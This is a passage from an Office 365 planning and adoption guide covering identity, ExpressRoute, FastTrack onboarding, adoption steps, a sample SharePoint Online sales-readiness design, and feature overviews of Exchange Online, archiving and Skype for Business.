It's important to carefully consider which identity model to use to get up and running. Think about time, existing complexity, and cost. These factors are different for every organization; Understanding Office 365 identity and Azure Active Directory topic reviews these key concepts for every identity model to help you choose the identity you want to use for your deployment.

**Related resources**:

- Azure AD Connect FAQ
- Prepare to provision users through directory synchronization to Office 365
- Fixing problems with directory synchronization for Office 365

## Azure ExpressRoute for Office 365

> **Read this first**: The Microsoft Cloud Networking for Enterprise Architects article describes what IT architects need to know about designing networking for organizations using Microsoft cloud services and platforms.

**Microsoft Azure ExpressRoute** lets you extend on-premises networks into the Microsoft cloud over a dedicated private connection facilitated by a connectivity provider. With ExpressRoute, you can establish connections to Microsoft cloud services, such as Microsoft Azure, Office 365, and CRM Online.



Connectivity can be from an any-to-any (IP VPN) network, a point-to-point Ethernet network, or a virtual cross-connection through a connectivity provider at a co-location facility. ExpressRoute connections do not go over the public Internet. This allows ExpressRoute connections to offer more reliability, faster speeds, lower latencies, and higher security than typical connections over the Internet.



**Connectivity to Microsoft cloud services**

ExpressRoute provides private network connectivity to Microsoft cloud services. Infrastructure and platform services running in Azure often benefit by addressing network architecture and performance considerations. Therefore, we recommend enterprises use ExpressRoute for Azure.

Software as a Service offerings, like Office 365 and Dynamics 365, were created to be accessed securely and reliably via the Internet. Therefore, **we only recommend ExpressRoute for these applications in specific scenarios**.

**Azure ExpressRoute for Office 365** is a premium network connection for connecting to Office 365 without using the public Internet. ExpressRoute offers Customers the ability to have control over the path their Office 365 network traffic takes.



Users no longer have to be concerned with the unpredictable routing that happens on the internet where data is carried by third party network. Traffic sent through ExpressRoute is sent directly across the network provider's network into Microsoft's network.

To properly understand routing traffic to Office 365 using Azure ExpressRoute, you'll need a firm grasp of the core ExpressRoute routing requirements and the ExpressRoute circuits and routing domains.

### Resources

- ExpressRoute FAQ
- Network connectivity to Office 365
- Azure ExpressRoute for Office 365
- Network planning with ExpressRoute for Office 365
- Routing with ExpressRoute for Office 365
- Implementing ExpressRoute for Office 365
- Media Quality and Network Connectivity Performance in Skype for Business Online
- Optimizing your network for Skype for Business Online
- ExpressRoute and QoS in Skype for Business Online
- Call flow using ExpressRoute

## Moving to Office 365

### FastTrack Center Benefit for Office 365

With FastTrack Center Benefit for Office 365, you work remotely with Microsoft specialists to get your Office 365 environment ready for use. FastTrack Center provides assistance for the following Office 365 services:

- Exchange Online
- SharePoint Online
- OneDrive for Business
- Skype for Business Online
- Project Online
- Project Pro for Office 365
- Yammer Enterprise
- Office 365 ProPlus

Your services are eligible if you purchase at least 50 licenses for an Office 365 tenant using the Enterprise E or K Plans or one of the plans listed here: Eligible Services and Plans. Onboarding has two major components:

- **Core onboarding** — These are tasks required for tenant configuration and integration with Azure Active Directory if needed. Core onboarding also provides the baseline for onboarding other eligible services.
- **Service onboarding** — These are the eligible services that licensed users can access.

The FastTrack Center Benefit Overview article provides an overview of the benefit process, lists the expectations for your source environment, describes the onboarding phases, and defines who's responsible for what in each phase.

Another important resource is the Microsoft Virtual Academy Course: Microsoft FastTrack: The Customer Success Service.

## Planning the Transition

> *"The secret of change is to focus all your energy not on fighting the old, but on building the new"*

**Reimagine Productivity.** *New way to work*

Enterprises today are focusing more than ever on how to give employees access to information, provide collaboration tools for internal and external use, and do it all across a multitude of devices.

The first step is all about understanding Office 365 Services and their capabilities and how these can help you transition to the new way to work. People are empowered to do their best work, on any device, while IT is able to responsibly manage security and compliance requirements.

Some examples of the technology transition can be …

- from Exchange DLs and simple Team Sites to Office 365 Groups
- from File Servers to Office 365 Groups or SharePoint Online or OneDrive for Business based on usage scenario or,
- from Exchange Public Folders to Yammer

**Drive Office 365 Adoption.** *More Services, More Usage*

A successful Office 365 rollout focuses on driving adoption and helping everyone understand the benefits of working in a new way.

The Four Steps Towards Successful Adoption section in this document gives a walkthrough of a four-step approach to help you successfully drive Office 365 adoption.

Defining a clear, concise, and comprehensive vision as a first step and outlining your desired business scenarios is always good for adoption in long term.

You can also start building scenarios using the Productivity Library available in FastTrack site as a reference.

Office Blogs also provides useful tips related to collaboration and productivity in the Business Academy section.

**Migrate from On-Premises.** *Less Servers, Less Usage*

Reducing the on-premises IT infrastructure footprint is an important pillar for the Return on Investment (RoI) on investment in Office 365.

As users and applications are enabled on Office 365, IT needs to work with business to plan and migrate all relevant applications and content from on-premises to Office 365.

Gradual and sustained reduction also leads to simpler IT landscape and a better Office 365 adoption in long term.

## Measuring the Progress

Best way to capture your transition to Office 365 and illustrate ROI to business is to spend time with their teams using the services and create **Success Stories** which can be shared with everyone in the Organization.

Given below are some ways to capture the progress …

- **Increase** in Office 365 Consumption. *Frequency*: Monthly
- **Decrease** in on-premises Server Farms, Storage and related Licenses. *Frequency*: Quarterly
- **Decrease** in Vendors. *Frequency*: Quarterly

## Customer Stories

Industry leaders and business executives from around the globe share their cloud productivity success stories on the Office Blogs. Some of the recent posts are:

- Mediterranean Shipping Company builds a global productivity network with Office 365
- Liberty Mutual launches an IT transformation
- Sanofi Pasteur unlocks quality excellence and unleashes innovation with Yammer
- Flex—delivering supply chain innovation on a global scale with Office 365
- Georgia State University tackles malware with Office 365 Advanced Threat Protection
- NGA Human Resources builds a more engaging employee experience with move to Office 365
- Renault Sport: Racing ahead with collaboration, analytics and data security using Office 365
- easyJet soars into a collaborative digital future with Office 365
- Macy's sets the standard for empowering employees using Office 365
- Land O'Lakes: advancing agriculture for a new generation
- The Hershey Company: where collaboration and productivity are a recipe for goodness
- Carhartt—building a durable, agile workplace with Office 365
- Grundfos makes global business happen with Office 365
- Carvajal switches to Office 365 for faster business, reduced costs
- Assurant: transforming a risk management solutions business with Office 365
- Democratizing data - Atkins goes digital by default with Office 365 E5
- Kelly Services - putting nearly one million people to work every year, one great hire at a time
- Discovery Communications embraces Office 365 to foster creative culture of innovation
- Kennametal saves more than $750,000 annually with move to Skype for Business Online

- Guardian Industries - connect, collaborate and innovate from anywhere
- Why Facebook is betting on Office 365 and the Microsoft Cloud
- CSC elevates workplace agility, cultivates new market opportunities with Office 365
- Polycom dials up business value using Office 365
- Mindtree uses Office 365 to create digital experiences, deliver innovative solutions
- Telefónica uses Yammer to stay engaged, aligned and more competitive
- Câmara Municipal de Cascais embarks on digital culture change with Office 365
- Smithfield Foods: many brands, a single mission
- Marks & Spencer uses Office 365 to boost competitive edge in global business
- Jabil - Global manufacturer moves to Office 365 to capture promise of digital manufacturing
- Atkins to become "digital by default" with move to Office 365
- Carlsberg continues to brew local favorites with global efficiency using Office 365
- Cushman & Wakefield - New opportunities for real estate on a global scale, supported by Office 365
- Quintiles quickly transforms into global modern workplace with Office 365
- Wolters Kluwer promotes global collaboration using Office 365
- Goodyear brings spirit of innovation to every facet of product development and delivery
- Employee engagement at KLM reaches new heights as crew share expertise on enterprise social platform
- Connected on day one - The Kraft Heinz Company creates united workforce quickly and smoothly
- Yammer posts top one million—British Airways inspires innovative teamwork
- AIA Group - Digitalizing teamwork to transform customer care in the insurance industry
- ABB - sparking innovation through the collective power of knowledge
- Booz Allen Hamilton increases staff engagement and collaboration with Office 365 and SharePoint Online
- Louis Vuitton - Building on a global culture of tradition and innovation to boost customer service and artistic excellence
- UL—product safety leader maintaining security and moving at the speed of innovation with Office 365
- At Aon, collaboration is key
- BASF - IT leader of world's no. 1 chemical company talks 'business-centered technology'
- TESCO - Democratizing a global business while building brand and customer loyalty
- 3M races forward to enable enterprise-wide collaboration
- Merck - A new foundation for connected business processes at a German pharmaceutical and chemical company
- Air Canada employees use the cloud to learn, share, develop ideas and collaborate

# DRIVING OFFICE 365 ADOPTION



Set vision & identify business scenarios | Prioritize solutions & create an adoption plan | Commit resources & execute on adoption plan | Measure, share success, & iterate

There are multiple strategies and possible paths to achieve a wide and impactful adoption of Office 365. Every Organization is unique in its own way so plan, try out, learn and innovate as you go along.

1) **Structured adoption process**. Go to Four steps towards successful adoption section
2) **Get quick wins**. Go to Getting Started Scenarios section
3) **Discover possibilities and get inspired**. Go to Productivity library section
4) **Think end-to-end transformation**.

## Four Steps Towards Successful Adoption

A successful Office 365 rollout focuses **on driving adoption and helping everyone understand the benefits of working in a new way**.

Driving adoption is about understanding the business challenges that you will address with solutions based out of Office 365. It is about ensuring that people across your organization understand the benefits and embrace the solutions you provide.

That's why we've created a four-step approach to help you successfully drive Office 365 adoption.

**1) Define a vision and identify business scenarios**

One of the most important factors in driving Office 365 adoption is to define a clear, concise, and comprehensive vision and outline your desired business scenarios. A well-defined business vision and list of targeted business objectives will serve as your guiding light throughout your launch and rollout planning, and also help secure buy-in across your organization.

**2) Prioritize solutions and create an adoption plan**

Once you've established your vision and have assessed your business challenges and opportunities, the next step is all about mapping the Office 365 capabilities to your targeted business goals and prioritizing the workloads that will help you get there.

**3) Commit resources and execute an adoption plan**

Raising awareness is an essential step to driving Office 365 adoption as it informs, involves, and inspires your users about the business value that Office 365 can bring to their day-to-day. As you go about launching your messaging and events, remember to highlight the vision and business scenarios that you identified in the previous adoption stages so you can easily convey the "What's in it for me?"

**4) Measure, share success, and iterate**

As you move through your adoption journey, it's important to continuously consolidate feedback, assess levels of success, and iterate on your approach through identifying new business scenarios, use cases, and audiences. After your organization-wide launch, measure how well Office 365 has been received and how usage relates back to the success criteria you established early on.

## Complete visioning exercise

**Host** a meeting with executives, key department stakeholders, project managers, and champions who understand overarching company goals.

**Discuss** the challenges and barriers that may be affecting workflows, and start to identify how new ways of working could make an impact.

**Consider these questions to drive the conversation:**

- What are the current collaboration and communications challenges within the organization?
- Why is the organization changing the way we work at this time?
- How does working in a new way support the organization's overarching mission, vision, and strategy?
- How will a more social and open way of working benefit the overall organization and employees personally?
- What does success look like following the adoption of this new way of working?

## Define your scenarios

**Host** a meeting to delve deeper into current challenges, strategies, and goals.

**Identify** the important business objectives and challenges, and start to recognize areas of opportunity to improve work processes.

**Consider these questions to drive the conversation:**

- What are some of the organization's challenges or pain points related to communication and collaboration?
- What are the main areas in which your organization would like to see improvement?
- What methods of communication and collaboration are typically better received by your organization than others?
- What is the process for drafting, distributing and sharing information?
- What are some of the factors that would help drive the business scenario forward?

**Top tasks and needs differ by Functions**

| | |
|---|---|
| Engineering, Research & Development | Share best practices across geographies |
| Operations, Logistics & Manufacturing | Improve and monitor business processes |
| Sales, Marketing, PR & Communications | Align Sales and Marketing teams |
| HR & Legal Services | Gather and process forms from employees |
| Accounting, Finance & Procurement | Pull data and build financial reports |
| Administration | Organize teams and manage calendars |

## Prioritize solutions

It's important to start small and demonstrate quick value, so that you don't overwhelm your teams. We encourage you to take the following four parameters into consideration as you work to prioritize the solutions and define your step-by-step approach.

- **Complexity**: How complex or difficult is it to put the solution into place? Complexity could be due to technical, organizational, or cultural challenges.
- **Added Value**: How much value will this usage scenario deliver to employees?
- **Impact**: Will the usage scenario impact employees across the whole company or is it specific to a team or department?
- **Leadership Involvement**: For each usage scenario, estimate the amount of leadership support you are likely to receive.

## Drive awareness & excitement

> *"If people understand how it's going to help them they will be more motivated to learn it."*

To maximize results, use a variety of tactics:

- **Communications**: including internal announcements or newsletters, is critical to driving adoption, as it informs and

inspires users about the new technology and helps create a natural "buzz" or excitement.

- **Engagement events**: such as parties, town hall meetings, contests, and giveaways, can help further momentum and encourage employees to start interacting with the new tools. Events should require users to interact with Office 365, so that they can experience the value first hand.
- **Training**: which can vary from classroom-style sessions to self-help getting started guides, is essential to ensure that employees understand how to actually use the new technologies to get their work done.

Keep in mind that the more communications, events and training sessions that you organize, the more likely your colleagues will engage with Office 365.

## Resources

**Read** ...

- Driving Adoption
- Get the adoption guide and the Adoption Plan Guide
- Getting to Know Office 365
- IT Showcase Productivity Guidance Zip Download
- Switching from IBM Lotus Notes 8.5
- Switching from Google Apps

# Getting Started Scenarios

Once you've established your vision and have assessed your business challenges and opportunities, the next step is all about mapping the Office 365 capabilities to your targeted business goals and prioritizing the workloads that will help you get there. Refer to: Identify Scenarios, Office 365 Catalog, Identify scenario templates and Office 365 productivity training.

Select from the following key scenarios or build your own using the Productivity Library.

**Get it done from anywhere**



People need consistent, fast experiences, regardless of their device. Find out how Office 365 enables you to get the job done from anywhere.

**Me and my documents.** With familiar Office experiences on the devices you use most, you can create with confidence, stay productive, and act on inspiration anywhere, anytime. Video tutorial

**Work together seamlessly.** Do your best work together with Office 365—wherever you like to work. Video tutorial

**Email and calendar on the go**



Office 365 makes it easier than ever to manage your inbox. Coordinate meetings. Access synchronized contacts. Check your task list. And tackle your busy calendar. All

so you can quickly deal with important matters on the go.

**Unite your group.** With Outlook Groups, groups can work together using the rich capabilities of email without the fear of overloading their inboxes. Each Outlook Group is a dedicated workspace that contains the full history of conversations, files, and meetings accessible to all members. Video tutorial

### Collaborate on Content



Access the documents and information you need, when you need them. SharePoint Online and OneDrive for Business empower teams to collaborate on documents, share reports with partners, and connect with colleagues and customers—from virtually any device.

**Anywhere access and sharing for your files.** OneDrive for Business makes it easy to access your files—and share them with colleagues—online and offline, at your desk or on the go. Video tutorial

**Collaborate and publish team and project information.** Create SharePoint team sites to help people work together better, keep them connected to the information they need, and provide rich destinations that promote their work across the organization. Video tutorial

### Make meetings matter



Getting the right people working together can be a challenge in our on-the-go-world. Skype for Business makes it easier for people to meet and connect online, across locations and devices.

**Communicate your way.** Get input without leaving your Office app. With Skype for Business integration, you can IM, screen-share, talk, or video-chat right from your document. Easily bring others into a conversation and share your desktop so you can make decisions in real time. Video tutorial

**Complete meeting solution.** Skype for Business helps your team work together from any location, on virtually any devices—as if you were all in one room. Share your desktop, annotate your presentations with feedback, record a meeting for future reference, and capture it all with OneNote for reference after the meeting. Video tutorial

### Bring your organization together



Yammer helps your organization listen, adapt, and grow in new ways by working like a network. Its open community feed helps employees get answers to their questions faster. Perhaps most important, Yammer can inspire unity and innovation by enabling people to learn from each other, share ideas and feedback, and be heard across your organization

**Launch your Yammer network.** Using Yammer enables people to easily share ideas and work together across geographies, cultures, and functional groups. Yammer brings groups across a company together, making it possible to tap into the knowledge

that exists within their organization and build on the work of others. Video tutorial

### Provide a chat-centered workspace



Workplace dynamics are changing and team collaboration has become a key part of getting work done. Today, employees work on two times more teams than they did just five years ago. Microsoft Teams is integrated with Office 365, so it gives the team a hub that brings together all of their chats, content, people, and tools.

**Achieve more together.** Teams can be more effective when all the conversations, content, people, and tools live in just one hub. Plus, team chats, files, and notes are available to the entire team and can be referenced at any time, so everyone's up to speed. Video tutorial [en-US]

**Connect your team.** Teams can communicate in whatever way works best in the moment: private chat with one or a group of people, chat with the entire team to tap into the group knowledge, or a call or video call for real-time collaboration. Video tutorial [en-US]

> **Drive Value.** Make sure everyone gets the most out of your investment in Office 365. FastTrack resources can help you increase adoption by raising awareness about the value Office 365 can bring to people's day-to-day activities.
>
> Talk to your FastTrack Engineer and refer to online resources here: FastTrack > Drive Value.

## Productivity Library

You can build your own scenarios using the Productivity Library available in FastTrack site. You can filter the scenarios by Roles, Industry and/or Products. To view a scenario, click on it.

**Sample scenario ...**

Educate distributed sales representatives from anywhere. Provide a way for distributed sales staff to attend training workshops and access product documentation from anywhere and on any device.

**Get started**

1. Easily schedule meetings accommodating multiple calendars
2. Make large group training virtual
3. Share training resources from a central location
4. Build a digital employee handbook
5. Engage in conversation with colleagues

**Case studies**

Telefonica calls on Office 365 and Yammer to power global workforce collaboration

# Typical Solutioning Process

Most organizations have a well-established process to convert business need into an application and iterate on it. You can extend the same for Office 365; the only major difference being that the target service should not be restricted to SharePoint Online. Put simply *Office 365 != SharePoint Online*.

A typical process is described below …

**Business problem**: Digital Transformation is leading to higher Customer expectations of knowledge from Salespersons.

**Stage 1**: Understand the problem. Lead: Business Analyst.

Today's Customer:

- Have access to detailed product information and expects specific solutions from sellers
- More likely to trust a seller who shows expertise about their company
- More likely to trust a seller that shares insights about the industry

Sales Challenge:

- Provide sellers with critical info and insights be more productive
- Accelerate skill development and reduce readiness time to deliver deeper knowledge faster product change
- Traveling sellers need social connections for peer engagement, collaboration, and feedback

Seller Readiness demands:

- Product capabilities/technology (changing ever faster)
- Value prop, positioning, and customer targeting
- Offers, promotions and pricing (more & complex)
- Industry/solution expertise (and partners/suppliers)
- Competitor offerings, positioning, and differentiation

**Stage 2**: How Office 365 will be leveraged. Lead: Enterprise Architect.

| Service | Capabilities and Usage |
|---|---|
| OneDrive for Business | • Personal storage (5TB per user) for work documents. 2-way offline sync<br>• Content related to customer engagements, events, analyst reports, projects worked on …<br>• Sharing (edit/view) content, folder with other Org users and Office 365 Groups<br>• Learning content related to work, interests, courses, conferences, seminars etc.. |
| Office 365 Groups | • Eases Team collaboration. Share emails, calendar, notebook, files, tasks, BI<br>• Use for Presales engagements, Bid Teams, Customer events, Focus Groups<br>• Share (edit/view) content with other Org users and Office 365 Groups<br>• Self-service. Provision / de-provision groups and add/remove members as per business need |

| Service | Capabilities and Usage |
|---|---|
| SharePoint Online | • Curated content - managed by Sales Excellence team. High value & High confidence.<br>• Information on all Industries, Services and Products served/sold by the Org<br>• Capabilities, technology, value prop, positioning, case studies and customer targeting info<br>• Offers and, promotions. Competitor offerings, positioning, and differentiation<br>• Document Templates. Presentations, RFP Responses, Case study and related content<br>• Guided learning, recommended content and search-driven community content<br>• Proposals, RFP Responses, Reference architectures. Metadata driven navigation and, search. |
| Skype Meeting Broadcast | • Live Video streaming sessions for Sales, Marketing and Leadership teams<br>• Monthly/Quarterly updates, major announcements, sessions by internal SMEs and external experts<br>• All broadcasts recorded and made available on Office 365 Videos |
| Office 365 Videos | • On-Demand Video streaming to drive readiness and improve customer conversation quality<br>• Complement the curated content – case studies, compete, leadership updates<br>• Ease transition to Sales roles<br>• Created using Skype Meeting Broadcast, Skype meetings or mobiles or, procured |
| Yammer | • Enables work like a network. Follow more people, groups and topics. Know more, know early.<br>• Connects Sales, Marketing and Leadership teams with other teams in the Org<br>• Engage users around ideas, feedback, updates, queries. Accelerate new hire on-boarding |
| Azure RMS | • Enables protection of financially or strategically sensitive content – emails, documents |
| Office | • Enables work from anywhere and using any device. Great presentations using mobile devices<br>• PCs: Office 365 ProPlus. Macs: Office 2016 for Mac. Mobile apps for iOS, Android |

All services except SharePoint Online can go-live at this stage.

**Stage 3**: Start planning for SharePoint Online. Lead: SharePoint Online Architect.

Multiple Site Collections

- 3 Site collections. One each for curated content, community content, and Records.
- Each can independently scale up to 1TB in size

- Allows more flexibility in features, branding and, roles & permissions.

Main Site Collection

- Core experience: Homepage and Landing pages with its static and dynamic content
- All curated content managed by Sales Excellence. No workflows or ratings. Content managers publishing content
- Open to all employees with read-only permission

Secondary Site Collection

- Community driven content with workflows, ratings and retention policies
- Open to all employees for contribution

Record Center

- Long term archival of all content. Hierarchical file plan as per the Records manager
- Access only to ~0.1 % employees

Related content in other services

- Office 365 Videos: hosts all Video content needed across multiple Channels
- Yammer: Groups to engage Sales excellence with Sales, Marketing, Practice, Leadership and others

**Stage 4**: Start SharePoint Online development. Lead: Developer

| Component | Purpose |
|---|---|
| Homepage | • Highlighted Content – new product, offering, promotion, case study or, leadership video<br>• Latest news, announcements, upcoming events, learning sessions … |
| Landing pages | • Individual homepage for each Industry, Service and Product.<br>• Standardised Page layout to ensure consistent look & feel across.<br>• Top: Title, description, introductory video, top 5 content, Yammer groups to join.<br>• Middle: Role based recommended content for each Sales stage.<br>• Bottom: Community content. Search-driven content based on metadata values |
| Repositories | • Page libraries to store / manage the web page content – homepage, landing pages<br>• Document libraries to store and manage documents<br>• IRM Integrated Document libraries to store and manage sensitive content |
| Content Types | • Manage multiple artefacts required – sales presentation, case study etc.<br>• Multiple columns attached to each type to capture relevant metadata. Mandatory or Optional<br>• Rating column to capture user feedback in form of ratings<br>• Information Policies attached to manage document lifecycle – deletion, archival … |

| Component | Purpose |
|---|---|
| Taxonomy Term Store | • Enables uniformity in the way users tag content, search for it and also refine the search results<br>• Manage taxonomies by managing term sets and the terms<br>• Managed metadata column in Content Types to enable users to select terms from a specific term set<br>• Global term sets: Verticals, Services, Products, Countries, Confidentiality, … |
| Content Organizer | • Upload all docs to a Drop-Off Library.<br>• Route documents to different libraries or folders which can be in a different sites<br>• Rules can be based on a combination of content types and metadata |
| Retention Policies | • Schedule how content is disposed by specifying a sequence of retention stages.<br>• Actions: Move to Recycle Bin, Permanently Delete, Transfer to another location, Start a Workflow<br>• Helps in clean-up too: Delete previous drafts, Delete all previous versions<br>• Ensures freshness of Sales repository. Moves old content to Records Center |
| Records Center | • Site to submit and find important documents that needs long term archival<br>• Submitted records are automatically placed in the correct library and folder based upon properties<br>• Curated and Community content would end up here using retention policies |
| Content Search Web Part (CSWP) | • Content Search web part issues a query and displays the search results<br>• To control how content is displayed in a CSWP, customize display templates.<br>• Use: Search-driven content on the landing pages, popular items or, recently changed items |

## Online Resources

**Watch Videos** …

- Office 365 delivers social networking
- Office 365 delivers web conferencing

For Manufacturing

- Office 365 helps manufacturing organizations streamline supply chain
- Office 365 helps manufacturing organizations sell effectively as a team
- Office 365 helps manufacturing organizations speed M&A and onboarding
- Office 365 helps manufacturing organizations improve field service
- Office 365 helps manufacturing organizations ensure operational excellence

- [Office 365 helps manufacturing organizations accelerate product innovation](#)

For Hospitality

- [Office 365 helps hospitality organizations open a new location](#)
- [Office 365 helps hospitality organizations deliver effective training](#)

For Retail

- [Office 365 helps retail organizations deliver training effectively](#)
- [Office 365 helps retail organizations improve supplier relations](#)
- [Modern Workplace: The Evolution of Store Communications](#)

For Financial Services

- [Office 365 helps financial services organizations meet regulatory demands](#)
- [Office 365 helps financial services organizations improve sales](#)

For Professional Services

- [Office 365 helps professional services organizations streamline firm administration](#)
- [Office 365 helps professional services companies deliver excellent service](#)
- [Office 365 helps professional services organizations elevate employee talent](#)

**Microsoft Virtual Academy Courses** ...

- [Reimagine Finance: Finance BI for Sales Organizations](#)
- [Reimagine Finance: Global Trade Compliance and Efficiency](#)

# SERVICES OVERVIEW

## Exchange Online (EXO)

Use business-class email through a rich and familiar **Outlook** experience you can access from your desktop or from a web browser using Outlook Web App.

### Features

- **Large mailboxes**: Each user gets 50 GB of mailbox storage and can send messages up to 150 MB in size. (Kiosk users get 2GB mailbox)
- **Unlimited storage**: Take advantage of unlimited storage - 50 GB of storage in the user's primary mailbox, plus unlimited storage in the user's In-Place Archive. (Not available for Kiosk users)
- **Outlook support**: Users can connect supported versions of Outlook to Exchange Online, so they can use the rich client application they already know.
- **Web-based access**: For web-client access, Outlook on the web provides a premium browser-based experience that matches the look and feel of the full Outlook client.
- **Outlook app**: Get more done on your phone and tablet with the Outlook app for iOS and Android.
- **Document collaboration**: Save attachments directly to OneDrive for Business with just one click and share the link to the file—right from Outlook on the web.
- **Groups**: Simplify collaboration with Office 365 Groups, which lets teams self-organize, work together across tools and devices, and build upon the expertise of others.
- **Shared calendar and contacts**: Compare calendars to schedule meetings and access collaboration features, including shared calendars, groups, the global address list, external contacts, tasks, conference rooms, and delegation capabilities.
- **In-Place Archive**: Keep your inbox clean by automatically moving old messages to an In-Place Archive.
- **In-Place Hold**: Use In-Place Hold to preserve deleted and edited mailbox items from users' primary mailboxes and In-Place Archives.
- **Data loss prevention (DLP)**: Control sensitive business data with built-in DLP policies based on regulatory standards such as PII and PCI, which help to identify, monitor, and protect sensitive data through deep content analysis.

For more comprehensive information, refer to [Exchange Online Service Description](#).

## Change how much mail to keep offline

You can decide how much mail is available in Outlook 2013/2016 when working offline with a slow or no network connection. Click **File** > **Account Settings** > **Account Settings**



Select an Exchange account, and then click **Change**. Under **Offline Settings**, move the slider to the desired amount of time. You can change this setting at any time.

Outlook 2016 and Outlook 2013 both provide the options of 1, 3, 6, 12, or 24 months, or All. Outlook 2016 provides the additional options of 3 days, 1 week, and 2 weeks. The following table shows the default Sync Slider setting for different disk sizes.

| Disk size | Default |
|-----------|---------|
| Smaller than or equal to 32 GB | 1 month |
| Greater than 32 GB, but smaller than 64 GB | 3 months |
| Equal to or greater than 64 GB | 1 year |

## Focus on what matters to you

We are being inundated with more information, more communication and more email vying for our attention. It is more critical than ever to have tools that help us cut through the noise and focus on what matters most. Today, Outlook is expanding the availability of two new experiences to do just that—**Focused Inbox** and **@mentions**.

### Focused Inbox

For many, the inbox is the command center for their day. It's the way to keep track of what is going on and what needs to get done. Outlook's Focused Inbox makes this process easier by helping you focus on the emails that matter most to you. It separates your inbox into two tabs—Focused and Other.

Emails that matter most to you are in the Focused tab, while the rest remain easily accessible—but out of the way in the Other tab. You'll be informed about email flowing to Other, and you can switch between tabs at any time to take a quick look.

Focused Inbox is a refinement and improvement of a previous feature called Clutter. Clutter's purpose was also to help you focus on the most important items in your inbox, but it did so by moving "Other" email to a separate folder. Focused Inbox makes it easier for you to stay on top of incoming email without having to visit another folder. As Focused Inbox rolls out, we'll stop moving messages to the Clutter folder.

Office 365 admins will have mailbox and tenant level control of the feature to stage the rollout in a manner that works best for their organization.

For more information, refer to: Focused Inbox for Outlook.

## @mentions

@mentions make collaborating on email fast and easy. Simply type the @ symbol anywhere in the body of your email and start typing to pick the person you want to address. Once you pick the person you want to address their name is highlighted in the message in blue, helping them know they are being asked to take an action in your message.

If the person isn't part of the email conversation already, they will be automatically added to the To... line so they receive a copy of your email.

## Resources

**Microsoft Virtual Academy Courses** ...

- What's New in Exchange Online
- Manage Exchange Online Services
- Exchange Hybrid Deployment

**Read** ...

For Admins

- Security and compliance for Exchange Online
- Exchange admin center in Exchange Online
- Exchange Online migration performance and best practices
- Monitoring, reporting, and message tracing in Exchange Online
- Use Office 365 tools for security investigations in Exchange Online and SharePoint Online
- Restrict access to email and O365 services with Microsoft Intune
- Restrict email access to Exchange Online and new Exchange Online Dedicated with Intune
- Intune service-to-service connector

For Users

- What's new in Exchange Online
- Change how much mail to keep offline
- Only a subset of your Exchange mailbox items are synchronized in Outlook 2016 or 2013
- Ways to migrate multiple email accounts to Office 365
- Clients and mobile in Exchange Online
- Email collaboration in Office 365
- Focused Inbox for Outlook

## Exchange Online Archiving (EOA)

Microsoft Exchange Online Archiving is a Microsoft Office 365 cloud-based, enterprise-class archiving solution for organizations that have deployed Microsoft Exchange Server 2013, Microsoft Exchange Server 2010 (SP2 and later), or subscribe to certain Exchange Online or Office 365 plans.

**Note: For Exchange Online customers, Exchange Online Archiving is what is referred to as "In-Place Archive" as feature in Exchange Online.**

## Features

**Archive mailbox**

- An archive mailbox is a specialized mailbox that appears alongside the users' primary mailbox folders in Outlook or Outlook Web App.
- Users can access the archive in the same way that they access their primary mailboxes. In addition, they can search both their archives and primary mailboxes.

**Move messages to Exchange Online Archiving**

- Users can drag and drop messages from .pst files into the archive, for easy online access.
- Users can also move email items from the primary mailbox to the archive mailbox automatically, using Archive Polices, to reduce the size and improve the performance of the primary mailbox.

**Deleted item recovery**

- Users can restore items they have deleted from any email folder in their archive.
- When an item is deleted, it is kept in the archive's Deleted Items folder. It remains there until it is manually removed by the user, or automatically removed by retention policies.
- After an item has been removed from the archive's Deleted Items folder, the item is kept in the archive's Recoverable Items folder for an additional 14 days before being permanently removed.
- Users can recover these items using the Recover Deleted Items feature in Microsoft Outlook or Outlook Web App.
- If a user has manually purged an item from the Recoverable Items folder, an administrator can recover the item within the same 14-day window, through a feature called Single Item Recovery.

**Retention policies**

- Helps organizations reduce the liabilities associated with email and other communications.
- Administrators can apply retention settings to specific folders in users' inboxes.
- Administrators can also give users a menu of retention policies and let them apply the policies to specific items, conversations, or folders.
- Offers two types of policies: **archive** and **delete**. Both types can be applied to the same item or folder. For example, a user can tag an email message so that it is automatically moved to the personal archive in a specified number of days and deleted after another span of days.

**In-Place eDiscovery**

- Supports In-Place eDiscovery for searching the contents of mailboxes, primary mailboxes and archives.

- Administrators or authorized Discovery managers can search a variety of mailbox items – including email messages, attachments, calendar appointments, tasks, and contacts.

For more comprehensive information, refer to Exchange Online Archiving Service Description.

## Scenarios

Exchange Online Archiving assists these organizations with their archiving, compliance, regulatory, and eDiscovery challenges while simplifying on-premises infrastructure, and thereby reducing costs and easing IT burdens.

- **Reduce potential liabilities**. Archive and delete emails as per business needs. Employees don't have to create and manage multiple PST files on their devices any more
- **Reduce Risk**. Compliance search and eDiscovery gives your Legal/Compliance teams ability to search all emails
- **Drive Mobile Productivity**. Employees can search and view all their emails from Outlook, Outlook on the Web and mobile devices.

## Resources

- Exchange Online Archiving Service Description
- Enable or disable archive mailboxes in Exchange Online
- Archive mailboxes in Exchange Online
- Retention Tags and Retention Policies
- Enable or disable single item recovery for a mailbox
- In-Place Hold and Litigation Hold

## Skype for Business Online (Skype)

Microsoft Skype for Business Online is a hosted communications service that **connects people anytime and from virtually anywhere**. It gives users access to presence, instant messaging, audio and video calling, rich online meetings, and extensive web conferencing capabilities.

### Skype for Business




| Enables you to | From your | With |
|---|---|---|
| • Text, call, communicate<br>• Meet, discuss, collaborate<br>• Connect, present, demonstrate | • Laptop<br>• Desktop<br>• Tablet<br>• Phone<br>• Skype Room System | • Colleagues<br>• Customers<br>• Skype contacts<br>• Remote users |

## Features

Features given below are based on the Skype for Business Online service working together with Skype for Business client app on the user's PC.

**Presence**

- Display presence status—for example, Available, Away, Do Not Disturb, or Offline—to let others know of your availability.
- Presence information is presented throughout the Office 365 suite.
- When Outlook calendar integration is enabled, check another user's schedule and get up-to-date availability information directly from that person's calendar

**Instant Messaging**

- Available for both Skype-to-Skype and multiparty communication. IM text is encrypted for enhanced security
- Within the IM window, photos of the sender/receiver appear inline with the conversation.

**Contacts List Configuration**

- Create a persistent list of contacts for all Skype for Business users
- Organize, and group these contacts in different ways (by department, for example).
- Search address books to find other users.

**Skype-to-Skype Audio and Video Calls**

- Make one-to-one computer-based audio and video calls to other Skype for Business users using a PC and a web camera.
- High-definition video (1920 x 1080) is supported for peer-to-peer calls between users running Skype for Business on high-end computers

**File Transfer**

- Provides PC-to-PC file transfer that lets users transfer files as part of a Skype for Business session

**Desktop and Application Sharing**

